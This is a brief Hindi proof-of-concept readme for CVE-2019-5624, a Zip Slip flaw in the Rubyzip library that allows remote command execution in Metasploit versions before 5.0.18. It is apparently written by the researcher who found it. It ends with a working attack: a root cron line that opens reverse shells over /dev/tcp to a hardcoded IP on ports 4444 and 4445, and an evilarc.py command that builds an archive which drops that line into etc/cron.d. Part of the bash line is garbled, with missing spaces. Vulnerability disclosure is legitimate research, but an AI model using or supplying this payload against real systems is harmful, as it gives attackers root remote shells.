
Metasploit के CVE-2019-5624 भेद्यता (Rubyzip असुरक्षित ZIP हैंडलिंग RCE) के लिए एक प्रमाण-अवधारणा
Metasploit के CVE-2019-5624 भेद्यता (Rubyzip असुरक्षित ZIP हैंडलिंग RCE) के लिए एक प्रूफ ऑफ कॉन्सेप्ट
फरवरी 2019 में मुझे Rubyzip लाइब्रेरी में एक नई भेद्यता मिली। यह एक हमलावर को असुरक्षित ZIP हैंडलिंग (Zip Slip) का शोषण करने की अनुमति देती है, जिसके परिणामस्वरूप रिमोट कमांड निष्पादन होता है।
इस भेद्यता का उपयोग Metasploit संस्करण < 5.0.18 को लक्षित करने के लिए किया गया था Metasploit Wrap-Up
मैंने भेद्यता को समझाते हुए यह विस्तृत ब्लॉग पोस्ट बनाया है।
* * * * * root /bin/bash -c "exec /bin/bash0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
python evilarc.py exploit --os unix -p etc/cron.d/